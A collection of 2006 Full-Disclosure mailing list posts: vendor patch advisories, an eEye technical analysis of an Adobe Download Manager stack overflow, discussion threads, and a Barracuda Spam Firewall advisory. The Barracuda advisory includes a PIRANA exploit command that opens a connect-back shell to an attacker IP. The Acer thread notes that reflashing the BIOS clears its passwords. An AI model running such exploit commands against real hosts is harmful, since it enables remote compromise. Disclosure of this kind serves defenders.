[Full-disclosure] CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Undocumented Features
(The following pre-advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf ) CYBSEC S.A. www.cybsec.com Pre-Advisory Name: SAP Internet Graphics Service (IGS) Undocumented Features == Vulnerability Class: Undocumented Features Release Date: 12/05/2006 = Affected Applications: == * SAP IGS 6.40 Patchlevel = 15 * SAP IGS 7.00 Patchlevel = 3 Affected Platforms: === * AIX 64 bits * HP-UX on IA64 64bit * HP-UX on PA-RISC 64bit * Linux on IA32 32bit * Linux on IA64 64bit * Linux on Power 64bit * Linux on x86_64 64bit * Linux on zSeries 64bit * OS/400 V5R2M0 * Solaris on SPARC 64bit * TRU64 64bit * Windows Server on IA32 32bit * Windows Server on IA64 64bit * Windows Server on x64 64bit Local / Remote: Remote === Severity: Medium = Author: Mariano Nuñez Di Croce === Vendor Status: == * Confirmed, update released. Reference to Vulnerability Disclosure Policy: = http://www.cybsec.com/vulnerability_policy.pdf Product Overview: == The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output. It is important to note that IGS is installed and activated by default with the Web Application Server (versions = 6.30) Vulnerability Description: == Undocumented features have been discovered in SAP IGS service, some of which may signify security risks. Technical Details: == Technical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow their customers to upgrade affected software prior to technical knowledge been publicly available. Impact: === Successful exploitation of this vulnerability allows to remotely shutdown SAP IGS service, access configuration files and to perform unauthorized actions over service deployment. Solutions: == SAP has released patches that disable the default-enabled access to the service HTTP interface. Beside, some commands has been disabled. Affected customers should apply the patches immediately. More information can be found on SAP Notes 959358 and 965201. Vendor Response: * 06/02/2006: Initial Vendor Contact. * 06/09/2006: Vendor Confirmed Vulnerability. * 07/03/2006: Vendor Releases Update for version 6.40. * 07/13/2006: Vendor Releases Update for version 7.00. * 10/08/2006: Vendor Confirmed Solution. * 12/05/2006: Pre-Advisory Public Disclosure. Special Thanks: === Thanks goes to Carlos Diaz and Victor Montero. Contact Information: For more information regarding the vulnerability feel free to contact the author at mnunez {at} cybsec.com. Please bear in mind that technical details will be disclosed to the general public three months after the release of this pre-advisory. For more information regarding CYBSEC: www.cybsec.com (c) 2006 - CYBSEC S.A. Security Systems ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1228-1] New elinks packages fix arbitrary shell command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1228-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff December 5th, 2006 http://www.debian.org/security/faq - -- Package: elinks Vulnerability : insufficient escaping Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-5925 Debian Bug : 399188 Teemu Salmela discovered that the elinks character mode web browser performs insufficient sanitising of smb:// URIs, which might lead to the execution of arbitrary shell commands. For the stable distribution (sarge) this problem has been fixed in version 0.10.4-7.1. For the upcoming stable distribution (etch) this problem has been fixed in version 0.11.1-1.2. For the unstable distribution (sid) this problem has been fixed in version 0.11.1-1.2. We recommend that you upgrade your elinks package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1.dsc Size/MD5 checksum: 855 f57923819fa4fce0caca333fb49a08cb http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1.diff.gz Size/MD5 checksum:25157 611bbe8d6abbdec32944915213b3ffea http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4.orig.tar.gz Size/MD5 checksum: 3533243 d97d1755f9553a3f5c68a3fe420c6a7c Alpha architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_alpha.deb Size/MD5 checksum: 1439074 2db129d65122955bd31c6a62700f0843 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_alpha.deb Size/MD5 checksum: 764102 0654e01c0d5ee49ddb8d24e01d4bd220 AMD64 architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_amd64.deb Size/MD5 checksum: 1364322 aa61b139f250715d1e9cb1725bfa7938 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_amd64.deb Size/MD5 checksum: 706090 18b9ebad31887943c0f54aebd0b355d6 ARM architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_arm.deb Size/MD5 checksum: 1314146 21885ec226e0eef970c24d0bda2c087c http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_arm.deb Size/MD5 checksum: 664026 f7c2193f6a4a68a090aabafdb7297d1b HP Precision architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_hppa.deb Size/MD5 checksum: 1376592 3cda3866a1e2fcf13e702e789ed075df http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_hppa.deb Size/MD5 checksum: 714314 9e491abd147dc046a3702269d9cd0d1b Intel IA-32 architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_i386.deb Size/MD5 checksum: 1325060 0c438d6afad2fbd82f37fb2a92d2e109 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_i386.deb Size/MD5 checksum: 671640 d448bedeaefc0de24d256a862401da14 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_ia64.deb Size/MD5 checksum: 1536618 c68927923c69e4d51e35df3bbca94736 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_ia64.deb Size/MD5 checksum: 838730 9b10a09bb38f156ab2392774e123ca34 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_m68k.deb Size/MD5 checksum: 1282356 ce4945f7b57906ee710bc0fb1fc23d04 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_m68k.deb Size/MD5 checksum: 639332 7e01f8968d3d7c3539164bcd5ddfe390 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_mips.deb Size/MD5 checksum: 1368274 72ad629b2802e1027517694a38c923e2 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_mips.deb Size/MD5 checksum: 711436 8fc708e7101e00c668ba06247f851012 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_mipsel.deb Size/MD5 checksum: 1365494
[Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is updated'. https://www.synapsenow.com/synapse/data/7117/documents/AS31-51-5110_Flash_v200.zip If you forget the bios password, they require the computer to be mailed to them; then they charge $100USD (citing labor security). The work around they don't tell you about is to download the bios flasher and update your bios. I tried contacting Acer about this bug and could not reach (was not transfered) the proper people; I've had teeth pulled that went better than trying to inform Acer. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote: Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is updated'. Flashing the bios will erase all data. It's a feature, not a bug. -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
On Tue, 05 Dec 2006 22:37:36 +0100, Tyop? said: On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote: Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is updated'. Flashing the bios will erase all data. So the big question becomes - on an Acer, are the passwords stored in the BIOS flash memory (in which case, having them evaporate on a BIOS flas is reasonable), or are they on the NVRAM chip, in which case it's a bug/misfeature? pgpv3j2wjqmOn.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
Tyop? a écrit : Flashing the bios will erase all data. It's a feature, not a bug. Bios passwords are stored on the CMOS, not the Rom itself, so no, it doesn't have to be. On the other side, if you can flash your ROM, you have iopl(3) hence root privileges or at least enougth privileges to get those passwors back (1). So that's really no bid deal. Regards, endrazine- (1) http://packetstorm.linuxsecurity.com/papers/password/Bios.Information.Leakage.txt side note: I think you both know nothing. Sadly, giving non technical _opinions_ has become the main source of postings on this list. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
endrazine a écrit : Just so you know : most Bios settings are stored on the Cmos, so if you can flash the Rom, you have ioperms at the very least on Cmos i/o ports, so you can reset the whole Cmos anyway. endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] EEYE: Adobe Download Manager AOM Stack Buffer Overflow Vulnerability
eEye Research - http://research.eeye.com Adobe Download Manager AOM Stack Buffer Overflow Vulnerability Release Date: December 5, 2006 Date Reported: November 10, 2006 Severity: High (Code Execution) Systems Affected: Adobe Download Manager 2.1.x and earlier Overview: eEye Digital Security has discovered a stack buffer overflow in Adobe Download Manager, a utility typically installed for the purpose of downloading Adobe software such as Adobe (Acrobat) Reader. By opening a malicious AOM file, a user's system may be compromised by arbitrary code within the file, which executes with the privileges of that user. A web-based attack conducted through Internet Explorer may succeed without the use of ActiveX or scripting, and without any additional user interaction other than viewing a web page, if the web server indicates a Content-Type of application/aom when serving up the malicious AOM file. In such a case, an .aom file extension is not required. Technical Details: AdobeDownloadManager.exe is responsible for extracting download instructions from AOM files, which are essentially XML with an appended CRC32 in decimal, and committing the instructions to the file %APPDATA%\dm.ini for later processing. For instance, opening the following AOM file: ?aom encoding=UTF-8? AdobeDownloadManager AOM DownloadRecord urlWelcomeToMyHumbleAdobe/url /DownloadRecord /AOM /AdobeDownloadManager3871966612 Will generate the following lines in dm.ini: [STARTUP] Status=IncompleteDownload [WelcomeToMyHumbleAdobe] StoreID=0 TransactionID=0 When launched, whether or not it is supplied with an AOM file, AdobeDownloadManager.exe reads the entries from dm.ini and handles each described download according to its properties. It begins by reading a list of section names into a 400h-byte buffer using GetPrivateProfileStringA, then copies each section name into a 108h-byte stack buffer using strncpy with a length limit equal to the length of the section name string. The result is a relatively straightforward stack buffer overflow, with the only complication being the character restrictions. It should be possible to uninstall Adobe Download Manager, or at least unassociate the AOM file extension and application/aom Content-Type in the registry, to defend against this vulnerability. Hopefully users who have been forced to install Adobe Download Manager realized its superfluousness and have already uninstalled it. Protection: Retina - Network Security Scanner has been updated to identify this vulnerability. Blink - Unified Client Security has proactively protected from this vulnerability since its discovery. Vendor Status: Adobe has released a patch for this vulnerability which is available at http://www.adobe.com/products/acrobat/acrrmanager.html. The vendor bulletin is available at: http://www.adobe.com/support/security/bulletins/apsb06-19.html. Credit: Derek Soeder Related Links: Retina - Network Security Scanner - Free Trial: http://www.eeye.com/html/products/retina/download/index.html Blink - Unified Client Security Personal - Free For Home Use: http://www.eeye.com/html/products/blink/personal/download/index.html Blink - Unified Client Security Professional - Free Trial: http://www.eeye.com/html/products/blink/download/index.html Greetings: Spooky action at a distance. Whoever else found that kernel race condition. Runner-up: Automatically Downloads Malware. (Thanks Daniel!) Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:224 ] - Updated xine-lib packages fix buffer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:224 http://www.mandriva.com/security/ ___ Package : xine-lib Date: December 5, 2006 Affected: 2007.0, Corporate 3.0 ___ Problem Description: Buffer overflow in the asmrp_eval function for the Real Media input plugin allows remote attackers to cause a denial of service and possibly execute arbitrary code via a rulebook with a large number of rulematches. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172 ___ Updated Packages: Mandriva Linux 2007.0: b0aa36d10d1ee53184b345c4a48b6fcb 2007.0/i586/libxine1-1.1.2-3.2mdv2007.0.i586.rpm 0c67ca2d47ea5594d2978573205c158f 2007.0/i586/libxine1-devel-1.1.2-3.2mdv2007.0.i586.rpm ee79849493b4b40f207e0e135dc9f4ca 2007.0/i586/xine-aa-1.1.2-3.2mdv2007.0.i586.rpm f0d942949cf3938287e3f4ec44275807 2007.0/i586/xine-arts-1.1.2-3.2mdv2007.0.i586.rpm db80c09dc6050a920aeae2e410ab4471 2007.0/i586/xine-dxr3-1.1.2-3.2mdv2007.0.i586.rpm 79f07b0afcbf4682752919829bde6fcf 2007.0/i586/xine-esd-1.1.2-3.2mdv2007.0.i586.rpm 51688356ab263c95b051712ed0f70def 2007.0/i586/xine-flac-1.1.2-3.2mdv2007.0.i586.rpm 74cd9a178d86754b337e4b1217874863 2007.0/i586/xine-gnomevfs-1.1.2-3.2mdv2007.0.i586.rpm 3f331ce5c5463512038ad69a785c9dbe 2007.0/i586/xine-image-1.1.2-3.2mdv2007.0.i586.rpm f147438cd7f07aaf70e1178bd2343133 2007.0/i586/xine-plugins-1.1.2-3.2mdv2007.0.i586.rpm 7cb84dbcf336d715b04812fbedb349cf 2007.0/i586/xine-sdl-1.1.2-3.2mdv2007.0.i586.rpm 860fe1ca635d076e9bfa1819e7b603cd 2007.0/i586/xine-smb-1.1.2-3.2mdv2007.0.i586.rpm c7a995ee090abd62b6a580b53e3c3364 2007.0/SRPMS/xine-lib-1.1.2-3.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: a1a3e704ff2f356784ad084f95d41f74 2007.0/x86_64/lib64xine1-1.1.2-3.2mdv2007.0.x86_64.rpm ee81c8526e7baf295f214338fa3d45cd 2007.0/x86_64/lib64xine1-devel-1.1.2-3.2mdv2007.0.x86_64.rpm bdb0a918df1d9239016741bde0027f3a 2007.0/x86_64/xine-aa-1.1.2-3.2mdv2007.0.x86_64.rpm 6cc4cc4b46b3dbeb22364ecc15d9c7d6 2007.0/x86_64/xine-arts-1.1.2-3.2mdv2007.0.x86_64.rpm 4d9ce5c5ef2814e2c18dcc60e6270322 2007.0/x86_64/xine-dxr3-1.1.2-3.2mdv2007.0.x86_64.rpm 38fe8e37988df8307028778421029349 2007.0/x86_64/xine-esd-1.1.2-3.2mdv2007.0.x86_64.rpm 53ccedaeef04ff9b15bcf3d63cdb8663 2007.0/x86_64/xine-flac-1.1.2-3.2mdv2007.0.x86_64.rpm b090fb7ac33b25d310dc8cfc4758062b 2007.0/x86_64/xine-gnomevfs-1.1.2-3.2mdv2007.0.x86_64.rpm 51d280def3f6c87276e9b4892c807d38 2007.0/x86_64/xine-image-1.1.2-3.2mdv2007.0.x86_64.rpm fdbfa62329ac6fadba0277db33b71cff 2007.0/x86_64/xine-plugins-1.1.2-3.2mdv2007.0.x86_64.rpm af8dda72b12c9a36d7a51d3d5916bb38 2007.0/x86_64/xine-sdl-1.1.2-3.2mdv2007.0.x86_64.rpm dea73578f285ebe1b1aac769cc0a549a 2007.0/x86_64/xine-smb-1.1.2-3.2mdv2007.0.x86_64.rpm c7a995ee090abd62b6a580b53e3c3364 2007.0/SRPMS/xine-lib-1.1.2-3.2mdv2007.0.src.rpm Corporate 3.0: e27a1f3f0a92a65ea9673d0aa7bd9660 corporate/3.0/i586/libxine1-1-0.rc3.6.14.C30mdk.i586.rpm cef9a906baabe8c8e18bbe45762268fd corporate/3.0/i586/libxine1-devel-1-0.rc3.6.14.C30mdk.i586.rpm 5260c623ea029663a3166c8e350b6306 corporate/3.0/i586/xine-aa-1-0.rc3.6.14.C30mdk.i586.rpm aa8ed9640d1e42608f1cd531d4d00dd6 corporate/3.0/i586/xine-arts-1-0.rc3.6.14.C30mdk.i586.rpm 1d311b51dc2ea55a1590ef409bfd9d9f corporate/3.0/i586/xine-dxr3-1-0.rc3.6.14.C30mdk.i586.rpm d8602b10e1b5b0ea29959c981bf5866e corporate/3.0/i586/xine-esd-1-0.rc3.6.14.C30mdk.i586.rpm ba65fc2fa69c85b848f7fe5728381003 corporate/3.0/i586/xine-flac-1-0.rc3.6.14.C30mdk.i586.rpm bbf13c446ebf132b6a474a9bf4a300cd corporate/3.0/i586/xine-gnomevfs-1-0.rc3.6.14.C30mdk.i586.rpm 18168e188258d645ba33103a743af3cb corporate/3.0/i586/xine-plugins-1-0.rc3.6.14.C30mdk.i586.rpm 11ff55c81b52559ff1b08bab917d63db corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.14.C30mdk.src.rpm Corporate 3.0/X86_64: fad4ae51ebdd06fe3b3f7848994bc7f0 corporate/3.0/x86_64/lib64xine1-1-0.rc3.6.14.C30mdk.x86_64.rpm 0aeb5bb0a613d0fa13788c7f2c64c871 corporate/3.0/x86_64/lib64xine1-devel-1-0.rc3.6.14.C30mdk.x86_64.rpm 755ab190b656fdbb9313189cce7f5a80 corporate/3.0/x86_64/xine-aa-1-0.rc3.6.14.C30mdk.x86_64.rpm ecf0b4ee0c12d1506432c297080bbb67 corporate/3.0/x86_64/xine-arts-1-0.rc3.6.14.C30mdk.x86_64.rpm 8433359eaa5ec8987efe65e6ada96132 corporate/3.0/x86_64/xine-esd-1-0.rc3.6.14.C30mdk.x86_64.rpm bbb1ac4807f1e8a7960d8704c79c6134 corporate/3.0/x86_64/xine-flac-1-0.rc3.6.14.C30mdk.x86_64.rpm 356f64f53ce7d552acc239cde30b60ea
Re: [Full-disclosure] Nmap Online
Why would you do this? On 11/28/06 3:19 AM, David Matousek [EMAIL PROTECTED] wrote: Hello, For all Nmap fans, our group have implemented Nmap Online service. Its address is http://nmap-online.com/. The interface allows you to perform custom Nmap scans from our server with only a few limitations in the syntax. The service is free and can be used immediately, no registration is required. Please direct your questions and suggestions to our emails. Regards, ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
You have experience in disarming land mines with a hammer while you are stark naked? Now that¹s a real man¹s job! On 11/27/06 4:20 PM, Brian Eaton [EMAIL PROTECTED] wrote: On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote: There is no hocus pocus here. Look at /var/log/secure and fine the term error retrieving and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny Parsing malicious input with shell commands is like disarming land mines with a hammer. And doing it as root? That's like disarming land mines with a hammer while you're stark naked. Regards, Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nmap Online
On 12/5/06, Simon Smith [EMAIL PROTECTED] wrote: Why would you do this? Well, for one, sometimes you need to do a port scan when you're not in front of a system that has nmap installed on it. I get a call about once every couple of months, why can't I get into my email server that's sitting behind a hardware router with a hole poked in it for port 110. Doing a port scan on the client's IP address ensures that either yes, the port is open or no, it's not. If it's open then I can proceed with my troubleshooting - if not, I know where to look for the problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-390-2] evince vulnerability
=== Ubuntu Security Notice USN-390-2 December 06, 2006 evince vulnerability CVE-2006-5864 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: evince 0.4.0-0ubuntu4.3 Ubuntu 6.06 LTS: evince 0.5.2-0ubuntu3.2 Ubuntu 6.10: evince 0.6.1-0ubuntu1.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-390-1 fixed a vulnerability in evince. The original fix did not fully solve the problem, allowing for a denial of service in certain situations. Original advisory details: A buffer overflow was discovered in the PostScript processor included in evince. By tricking a user into opening a specially crafted PS file, an attacker could crash evince or execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3.diff.gz Size/MD5:11703 57da8bfc0ad787ae9c8ecd69c517249c http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3.dsc Size/MD5: 1873 72d17a9bdb8a65e1a240834099cfdbe6 http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0.orig.tar.gz Size/MD5: 1172276 9c1009e3dae55bcda1bc5204f021ad1b amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_amd64.deb Size/MD5: 652508 2815d3389a1260c6388485b71c3bb5b1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_i386.deb Size/MD5: 602688 3f7768319e1d5f8f3a3131cf23856c86 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_powerpc.deb Size/MD5: 637256 0c2653001eb6c40e0a3228f8dd49598f sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_sparc.deb Size/MD5: 616900 ade92071c11fd148af61ec3f57900ea3 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2.diff.gz Size/MD5:11818 e485f45171c5558cb7d7fec930f050ba http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2.dsc Size/MD5: 1977 15a5db1f73061fbf0d468e9c4a8fe0c7 http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2.orig.tar.gz Size/MD5: 1362513 5020afb1768d89c251ad8c2a233d9fcf amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_amd64.deb Size/MD5: 747902 8f75cb0125481699918dfd23c3d81718 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_i386.deb Size/MD5: 692882 392d072d36c0c200f14ff44c5dd40858 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_powerpc.deb Size/MD5: 729070 d5053fd093002988670243a050f8be1f sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_sparc.deb Size/MD5: 704756 19aa53d800f922641d8660417a982fc4 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2.diff.gz Size/MD5: 7742 31f26b98ab68c5c9f7bb9a133ddec8f3 http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2.dsc Size/MD5: 1679 6e3252457e5c8703932a04804c2af514 http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1.orig.tar.gz Size/MD5: 1687870 665387e278d4da97f7540aeddeaae57d amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_amd64.deb Size/MD5: 944244 bbcc0ea3a31c4f71c528dbf4d144f0e3 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_i386.deb Size/MD5: 901854 ab0b5badc19b9c7665dee69ab937dd02 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_powerpc.deb Size/MD5: 926276 fda07c35d1f38589f515720772888785 sparc architecture (Sun SPARC/UltraSPARC)
Re: [Full-disclosure] Nmap Online
-Original Message- From: Ed Carp [mailto:[EMAIL PROTECTED] Sent: Wednesday, 6 December 2006 2:06 PM To: full-disclosure@lists.grok.org.uk Cc: David Matousek Subject: Re: [Full-disclosure] Nmap Online On 12/5/06, Simon Smith [EMAIL PROTECTED] wrote: Why would you do this? Well, for one, sometimes you need to do a port scan when you're not in front of a system that has nmap installed on it. I get a call about once every couple of months, why can't I get into my email server that's sitting behind a hardware router with a hole poked in it for port 110. Doing a port scan on the client's IP address ensures that either yes, the port is open or no, it's not. If it's open then I can proceed with my troubleshooting - if not, I know where to look for the problem. I don't wish to upset anyone but that answer has to be the craziest FIRST port of call approach I have seen used. I get plenty of those sorts of calls. I take about 30 seconds time on the phone for almost all of them. I say Pull the power plug out of the router. Wait 10 seconds, plug it back in and wait another 10 seconds. OK, try now and almost all of them report it works well. So why would I need and how could I use Nmap online to tell me the router went crazy and locked up? Besides, wouldn't it be just as easy to use the Nmap sitting on my computer if I decided I needed to use it? Greg. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Barracuda Convert-UUlib library buffer overflow leads to remote compromise
Topic: Barracuda Convert-UUlib library buffer overflow leads to remote compromise Announced: 2006-12-05 Product:Barracuda Spam Firewall Vendor: http://www.barracudanetworks.com/ Impact: Remote shell access Affected product: Barracuda Spam Firewall with firmware 3.3.15.026 AND virus definition 2.0.325 Credits:Jean-Sébastien Guay-Leroux CVE ID: CVE-2005-1349 I. BACKGROUND The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection: * Anti-spam * Anti-virus * Anti-spoofing * Anti-phishing * Anti-spyware (Attachments) * Denial of Service II. DESCRIPTION In 2005, Mark Martinec and Robert Lewis found a flaw in the Convert- UUlib library. Few details were published regarding this flaw. After some research, I found that the flaw was in the part of the code where BinHex files were getting parsed. By supplying an invalid size for the resource fork or data fork in a BinHex's file header, it is possible to create a heap overflow. By taking advantage of the sequentials calls to free(), it's possible to overwrite more than 4 bytes. In fact, we can write a jmpcode in memory that will jump to one of our registers containing the location of our shellcode. By using this technique, the exploit will be much more reliable. You will only need to supply a return location address to the exploit code. You do NOT need to have remote administration access (on port 8000) for successfull exploitation. For further informations about the details of the bugs, check the exploit code. III.IMPACT Gain shell access to the remote Barracuda Spam Firewall. IV. PROOF OF CONCEPT Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the Convert-UUlib vulnerability. The version 0.3.1 of the PIRANA framework incorporates a new module to exploit the Convert-UUlib library bug. It contains three hardcoded offsets that should reliably exploit every Barracuda Spam Firewall with a firmware below 3.3.15.026 and virus definition below 2.0.325. By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234: perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \ -l 1.2.3.4 -p 1234 V. VERSIONS AFFECTED This affects firmware releases before versions 3.3.15.026. This is no longer an issue with Barracuda's customers with current Energize Updates, running virus definition 2.0.325, released Nov. 29, 2006. It is recommended that Barracuda's customers upgrade to the latest generally available release. VI. CREDITS Mark Martinec and Robert Lewis found the original flaw in Convert- UUlib. Jean-Sébastien Guay-Leroux conducted further research on the bug and produced an exploitation plugin for the PIRANA framework. VII.REFERENCES http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1349 VIII. HISTORY 2005-04-26 : Bug is disclosed by Mark Martinec and Robert Lewis. 2006-08-?? : Convert-UUlib module exploit written for PIRANA. 2006-11-28 : Barracuda Networks is notified about the problem. 2006-11-28 